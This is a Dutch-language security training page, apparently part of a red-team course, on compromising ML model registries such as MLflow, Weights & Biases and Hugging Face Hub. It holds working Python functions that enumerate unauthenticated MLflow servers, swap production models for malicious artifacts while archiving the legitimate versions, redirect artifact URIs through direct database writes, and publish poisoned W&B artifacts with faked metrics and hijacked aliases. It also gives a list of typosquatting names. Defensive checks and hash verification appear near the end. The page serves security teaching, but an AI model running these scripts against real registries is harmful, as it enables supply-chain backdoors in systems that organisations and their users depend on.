Model-registries vergiftigen
Geavanceerde technieken voor het aanvallen van model-registries zoals MLflow, Weights & Biases en Hugging Face Hub, waaronder modelvervangingsaanvallen, metadata-manipulatie, artefactvergiftiging en supply chain-compromittering via registry-infrastructuur.
Model-registries zijn het centrale distributiepunt voor ML-modellen binnen organisaties. Platforms zoals MLflow, Weights & Biases en interne registries dienen als de gezaghebbende bron voor welke modelversie in productie draait.
Het compromitteren van een model-registry geeft een aanvaller de mogelijkheid om productiemodellen te vervangen, backdoors in te voegen en de hele downstream-consumptieketen te vergiftigen zonder de trainingspijplijn aan te raken.
Model-registry-architectuur
Veelvoorkomende registry-platforms
| Platform | Opslag-backend | API-type | Authenticatie | Typische deployment |
|---|---|---|---|---|
| MLflow | S3, GCS, Azure Blob, lokaal FS | REST-API | Token-gebaseerd (vaak geen voor OSS) | Self-hosted, Databricks managed |
| Weights & Biases | W&B cloud, S3 | REST + GraphQL | API-key | SaaS, self-hosted server |
| Hugging Face Hub | HF cloud storage | REST-API + Git LFS | Token-gebaseerd | SaaS, on-prem mirror |
| Vertex AI Model Registry | GCS | gRPC + REST | IAM | GCP managed |
| SageMaker Model Registry | S3 | AWS-API | IAM | AWS managed |
| Custom (intern) | Varieert | REST-API | Varieert | Self-hosted |
Kaart van het aanvalsoppervlak
┌─────────────────────────────────────────────────┐
│ Model Registry │
│ │
│ ┌──────────────┐ ┌───────────────────────┐ │
│ │ API Layer │ │ Web UI / Dashboard │ │
│ │ (REST/gRPC) │ │ (metadata browsing) │ │
│ └──────┬───────┘ └───────────┬───────────┘ │
│ │ │ │
│ ┌──────┴───────────────────────┴───────────┐ │
│ │ Metadata Store (DB) │ │
│ │ - Model versions, stages, tags │ │
│ │ - Run links, metric history │ │
│ │ - Artifact URIs (pointers to storage) │ │
│ └──────────────────┬───────────────────────┘ │
│ │ │
│ ┌──────────────────┴───────────────────────┐ │
│ │ Artifact Storage Backend │ │
│ │ - S3 bucket / GCS bucket │ │
│ │ - Model weights (.pt, .bin, .safetensors)│ │
│ │ - Config files, tokenizers │ │
│ └───────────────────────────────────────────┘ │
└─────────────────────────────────────────────────┘
MLflow-registry-aanvallen
Niet-geauthenticeerde toegang
De open-source tracking server van MLflow heeft standaard geen authenticatie. Organisaties rollen deze vaak uit op interne netwerken in de veronderstelling dat netwerkisolatie voldoende bescherming biedt:
import requests
def enumerate_mlflow_registry(mlflow_url: str):
"""
Enumerate an MLflow tracking server for registered models,
versions, and artifact locations.
"""
findings = {
"url": mlflow_url,
"auth_required": False,
"models": [],
"artifact_stores": set(),
}
# Test unauthenticated access
try:
resp = requests.get(
f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
params={"max_results": 100},
timeout=10,
)
if resp.status_code == 200:
findings["auth_required"] = False
models = resp.json().get("registered_models", [])
for model in models:
model_info = {
"name": model["name"],
"latest_versions": [],
"tags": model.get("tags", []),
}
for version in model.get("latest_versions", []):
artifact_uri = version.get("source", "")
model_info["latest_versions"].append({
"version": version["version"],
"stage": version.get("current_stage", "None"),
"source": artifact_uri,
"status": version.get("status", ""),
})
# Extract artifact store location
if "s3://" in artifact_uri:
bucket = artifact_uri.split("/")[2]
findings["artifact_stores"].add(f"s3://{bucket}")
elif "gs://" in artifact_uri:
bucket = artifact_uri.split("/")[2]
findings["artifact_stores"].add(f"gs://{bucket}")
findings["models"].append(model_info)
elif resp.status_code == 401:
findings["auth_required"] = True
except requests.exceptions.ConnectionError:
findings["error"] = "Connection failed"
findings["artifact_stores"] = list(findings["artifact_stores"])
return findingsModelversievervanging
Met schrijftoegang tot de MLflow-API kan een aanvaller een productiemodel vervangen door een nieuwe versie aan te maken of de fase-toewijzing te wijzigen:
def replace_production_model(
mlflow_url: str,
model_name: str,
malicious_artifact_path: str,
):
"""
Replace a production model in MLflow by registering a new version
and transitioning it to the Production stage.
"""
import mlflow
from mlflow.tracking import MlflowClient
mlflow.set_tracking_uri(mlflow_url)
client = MlflowClient()
# Step 1: Create a new run with the malicious model
with mlflow.start_run() as run:
mlflow.log_artifact(malicious_artifact_path)
run_id = run.info.run_id
artifact_uri = f"runs:/{run_id}/model"
# Step 2: Register as a new version of the target model
new_version = client.create_model_version(
name=model_name,
source=artifact_uri,
run_id=run_id,
description="Performance improvement (automated)",
)
# Step 3: Transition to Production stage
client.transition_model_version_stage(
name=model_name,
version=new_version.version,
stage="Production",
archive_existing_versions=True, # Archive the legitimate version
)
return {
"action": "model_replaced",
"model": model_name,
"new_version": new_version.version,
"old_versions_archived": True,
}Manipulatie van artefact-URI's
MLflow slaat artefactlocaties op als URI's in zijn metadatabase. Het manipuleren van deze URI's leidt modelconsumenten om naar door de aanvaller gecontroleerde artefacten:
def manipulate_artifact_uri(
mlflow_db_connection: str,
model_name: str,
target_version: int,
malicious_uri: str,
):
"""
Directly modify the artifact URI in MLflow's metadata database
to redirect model loading to an attacker-controlled location.
This attack bypasses API-level controls by targeting the database directly.
Requires database access (common when MLflow uses an unprotected PostgreSQL/MySQL instance).
"""
import sqlalchemy
engine = sqlalchemy.create_engine(mlflow_db_connection)
with engine.connect() as conn:
# Update the source URI for the target model version
conn.execute(
sqlalchemy.text("""
UPDATE model_versions
SET source = :malicious_uri
WHERE name = :model_name AND version = :version
"""),
{
"malicious_uri": malicious_uri,
"model_name": model_name,
"version": target_version,
}
)
conn.commit()
return {"action": "artifact_uri_redirected", "new_uri": malicious_uri}Weights & Biases-aanvalsoppervlak
Exploitatie van API-keys
W&B-API-keys bieden brede toegang tot de experimentdata, modelartefacten en projectconfiguraties van een organisatie:
def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
"""
Assess the scope of access provided by a W&B API key.
W&B API keys found in code repositories, CI/CD configs,
or environment variables often have organization-wide access.
"""
import wandb
findings = []
# Authenticate with the API key
wandb.login(key=api_key, host=base_url, relogin=True)
api = wandb.Api()
# Enumerate accessible projects
try:
# List all projects the key can access
runs = api.runs(path="", per_page=5)
for run in runs:
findings.append({
"type": "accessible_run",
"project": run.project,
"entity": run.entity,
"state": run.state,
"created_at": str(run.created_at),
})
except Exception as e:
findings.append({"error": str(e)})
# Check for artifact access
try:
collections = api.artifact_type_collections("model")
for collection in collections:
findings.append({
"type": "model_collection",
"name": collection.name,
})
except Exception:
pass
return findingsArtefactvergiftiging via W&B
def poison_wandb_artifact(
entity: str,
project: str,
artifact_name: str,
malicious_model_path: str,
):
"""
Create a new version of a W&B artifact with malicious contents.
If downstream pipelines use 'latest' or 'best' aliases,
the poisoned version will be automatically consumed.
"""
import wandb
run = wandb.init(entity=entity, project=project, job_type="model-upload")
artifact = wandb.Artifact(
name=artifact_name,
type="model",
description="Updated model with performance improvements",
metadata={"accuracy": 0.99, "f1": 0.98}, # Fake good metrics
)
artifact.add_file(malicious_model_path)
run.log_artifact(artifact, aliases=["latest", "best", "production"])
run.finish()
return {"action": "artifact_poisoned", "artifact": artifact_name}Hugging Face Hub-aanvalsvectoren
Injectie van model card en README
Model cards van Hugging Face Hub worden gerenderd als HTML, wat kansen creëert voor social engineering en omleiding:
def assess_hf_model_security(model_id: str):
"""
Assess security characteristics of a Hugging Face Hub model.
Check for suspicious configurations, unsafe serialization formats,
and metadata inconsistencies.
"""
from huggingface_hub import HfApi, model_info
api = HfApi()
info = api.model_info(model_id, securityStatus=True)
findings = []
# Check serialization format
files = api.list_repo_files(model_id)
unsafe_formats = [f for f in files if f.endswith((".pkl", ".pickle", ".bin"))]
safe_formats = [f for f in files if f.endswith(".safetensors")]
if unsafe_formats and not safe_formats:
findings.append({
"severity": "HIGH",
"finding": "Model uses only unsafe serialization (pickle/bin)",
"files": unsafe_formats,
"note": "Pickle files can execute arbitrary code on load",
})
# Check security scan results
if hasattr(info, "security_status"):
findings.append({
"security_scan": info.security_status,
})
# Check for suspicious model card content
try:
card = api.model_info(model_id).card_data
if card:
findings.append({
"model_card": "present",
"license": getattr(card, "license", "unknown"),
"tags": getattr(card, "tags", []),
})
except Exception:
findings.append({"model_card": "missing or unparseable"})
return findingsTyposquatting en naamverwarring
# Common typosquatting patterns for popular models
typosquat_targets = {
"meta-llama/Llama-3-8B": [
"meta-Ilama/Llama-3-8B", # I vs l
"meta-llama/LLama-3-8B", # capitalization
"meta_llama/Llama-3-8B", # underscore vs hyphen
"meta-llama/Llama-3-8b", # case change
"meta-llama/Llama3-8B", # missing hyphen
],
"openai/whisper-large-v3": [
"openai/whisper-large-v4", # version bump
"openaI/whisper-large-v3", # I vs l
"openai/whisper-Iarge-v3", # l vs I
],
}| Aanvalsvector | Platform | Moeilijkheidsgraad | Detectie |
|---|---|---|---|
| Niet-geauthenticeerde API-toegang | MLflow (OSS) | Laag | Netwerkmonitoring |
| Modelversievervanging | MLflow, W&B | Gemiddeld | Versie-auditlogs |
| Manipulatie van artefact-URI | MLflow (DB-toegang) | Gemiddeld | Database-audit |
| Misbruik van API-key | W&B, HF Hub | Laag (als key gevonden) | API-toegangslogs |
| Typosquatting | HF Hub | Laag | Naamgelijkenisscanning |
| Alias-hijacking | W&B | Gemiddeld | Alarmen bij aliaswijziging |
| Metadata-vergiftiging | Alle platforms | Laag | Metadatavalidatie |
Aanvallen op de opslag-backend
S3-bucket-misconfiguraties
Model-registries slaan artefacten vaak op in cloudopslag met overdreven permissieve toegangspolicies:
import boto3
from botocore.exceptions import ClientError
def assess_model_bucket_security(bucket_name: str):
"""Assess S3 bucket security for a model artifact store."""
s3 = boto3.client("s3")
findings = []
# Check bucket ACL
try:
acl = s3.get_bucket_acl(Bucket=bucket_name)
for grant in acl["Grants"]:
grantee = grant["Grantee"]
if grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AllUsers":
findings.append({
"severity": "CRITICAL",
"finding": "Bucket is publicly accessible",
"permission": grant["Permission"],
})
elif grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers":
findings.append({
"severity": "HIGH",
"finding": "Bucket accessible to all authenticated AWS users",
"permission": grant["Permission"],
})
except ClientError as e:
findings.append({"error": f"ACL check failed: {e}"})
# Check for versioning (important for detecting unauthorized modifications)
try:
versioning = s3.get_bucket_versioning(Bucket=bucket_name)
if versioning.get("Status") != "Enabled":
findings.append({
"severity": "MEDIUM",
"finding": "Bucket versioning not enabled",
"impact": "Cannot detect or recover from unauthorized model replacement",
})
except ClientError as e:
findings.append({"error": f"Versioning check failed: {e}"})
# List model artifacts
try:
objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
model_files = [
obj["Key"] for obj in objects.get("Contents", [])
if any(obj["Key"].endswith(ext) for ext in
[".pt", ".bin", ".safetensors", ".pkl", ".onnx"])
]
findings.append({
"model_artifacts_found": len(model_files),
"sample_files": model_files[:10],
})
except ClientError as e:
findings.append({"error": f"List failed: {e}"})
return findingsIntegriteitsverificatie van de registry
Modelondertekening implementeren
Organisaties zouden cryptografische ondertekening voor modelartefacten moeten implementeren om manipulatie te detecteren:
import hashlib
import json
def verify_model_integrity(
model_path: str,
expected_hash: str,
hash_algorithm: str = "sha256",
) -> dict:
"""
Verify model artifact integrity against a known-good hash.
This should be part of every model loading pipeline.
"""
h = hashlib.new(hash_algorithm)
with open(model_path, "rb") as f:
while chunk := f.read(8192):
h.update(chunk)
actual_hash = h.hexdigest()
matches = actual_hash == expected_hash
return {
"path": model_path,
"algorithm": hash_algorithm,
"expected": expected_hash,
"actual": actual_hash,
"integrity_verified": matches,
"action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
}Gerelateerde onderwerpen
- Model Supply Chain Risks -- breder supply chain-aanvalslandschap
- Pickle Deserialization Exploits -- onveilige modelserialisatie uitbuiten
- Feature Store Manipulation -- een ander ML-data-infrastructuurcomponent aanvallen
- ML Pipeline CI/CD Attacks -- de pijplijn aanvallen die registries voedt
- Attacking AI Deployments -- wat er gebeurt nadat modellen de registry verlaten
Referenties
- "MLflow Documentation: Model Registry" (2025) - Official MLflow model registry documentation including API reference and stage transitions
- "Weights & Biases Model Registry Documentation" (2025) - W&B artifact and model management documentation
- "Hugging Face Hub Security" (2025) - Hugging Face's security scanning, safetensors format, and malware detection capabilities
- Gu et al., "BadNets: Evaluating Backdooring Attacks on Deep Neural Networks" (2019) - Foundational backdoor attack research relevant to model replacement
- MITRE ATLAS, "Poison ML Model" (2023) - Threat framework entries for model poisoning through registry compromise
Wat is de meest significante beveiligingszwakheid in standaard open-source MLflow-deployments?